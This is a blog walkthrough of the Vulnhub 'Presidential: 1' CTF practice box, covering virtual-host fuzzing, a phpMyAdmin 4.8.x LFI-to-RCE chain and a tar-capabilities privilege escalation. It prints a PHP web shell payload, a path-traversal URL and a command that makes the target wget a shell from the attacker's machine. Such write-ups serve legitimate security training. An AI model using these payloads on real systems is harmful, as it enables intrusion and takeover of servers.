Monday, July 20, 2020

Presidential: 1: Vulnhub CTF Walkthrough

Vulnhub: https://www.vulnhub.com/entry/presidential-1,500/ 
** Just a heads up, I was able to import into VMware Workstation without an issue. **
1.  First, doing a nmap scan for the CTF box’s IP Address.  Once discovered, doing a nmap scan for available service ports.

2. We have two available ports, 2082 and port 80.  Port 2082 was a ssh service and port 80 was an apache service running.
3. We do a dirb scan for port 80 to do directory enumeration.  
4. We also need to observe and enumerate the web pages. I did this using Burp.  I did not find much honestly for a while.  I took note of the domain votenow.local and added to my hosts file.  However, I was presented with the same information.  
5. This is where I asked for clue from the author of the CTF.  He mentioned there may be a hidden sub-domain and a backup file that could help get my a foothold to the box.  I never thought of virtual hosts for the box.  I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain.  Time to add it to the host file. 

6. This is where I scanned the hidden subdomain for all kinds of possible backup files.  Nothing. Well, interesting anyway. 
7.  What am I missing?  There must be a backup file somewhere.  I bet it is something simple too. Arrghhh.
8.  Ok, clue number 2.  Author suggested maybe try the main domain.   Of course, I missed that, and it has CREDS!!
User: votebox
Password: casoj3FFASPsbyoRP
9. I was able to get in.  Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table.  I see there is a hash for the admin’s user account.  That is all I see but hopefully I can use it somehow. 
* Used the hash from the users table in the web app.  
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password.  I was not able to use it to login or get different access to the phpMyAdmin app. Then, again I checked the phpMyAdmin version and checked for vulns again:
* https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/
* https://cupuzone.wordpress.com/2018/07/23/a-little-study-about-latest-phpmyadmin-4-8-0-4-8-1-lfi-vulnerability/
* https://www.exploit-db.com/exploits/44924
* https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
* https://misduong.blogspot.com/2018/06/phpmyadmin-48x-lfi-to-rce-authorization.html
* https://cxsecurity.com/issue/WLB-2018070139
13.  I can exploit the LFI vuln using the database.  I was able to view the PHP config with phpinfo().  It took a minute to find the exact directory location for my session, but I eventually found it. 


14.  Now, let’s see if we can get a web shell in:   select "<?php passthru($_GET ['cmd']);exit;?>"
15.  http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=id
16. It worked.  We now know that the process is running as apache instead of root.  
17.  We should be able to get a better web shell in there.  We just need to host a page and get our small web shell to request the better one.


18.  With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=wget%20http://192.168.126.1/agoonie.php%20-O%20shell.php
19. I looked around for processes running as root.  Also, I looked for anything in the home directories.  There was only the admin dir.  It had two weird text files, user.txt and notes.txt.  Also, noted the version of the OS:  Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.  
[admin@votenow ~]$ cat notes.txt
cat notes.txt
Reminders:
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
cat user.txt
663ba6a402a57536772c6118e8181570
20.  I was stuck here.  Uploaded the LinEnum.sh file.  Looked for sticky bit files, more weird processes, etc.  Found nothing.  Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help. 
21.  After reading about this, now I got the clues from the text files in the admin folder.  Additional reading:  
* https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
* https://materials.rangeforce.com/tutorial/2020/02/19/Linux-PrivEsc-Capabilities/
* https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
22. So identified the tarS executable that could copy the shadow file and allow us to read it.  I tried to crack it but no dice.  I even thought I could possibly rewrite it and add my own hash to it. Nope. 
23. I remembered about the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF but it worth checking out.  I tried writing a bash script that could possibly escalate me. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
24.  I see the ssh_id file and we have the ssh port.  Hopefully, it is not password protected.  We are in.  

25.  I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.  

No comments:

Post a Comment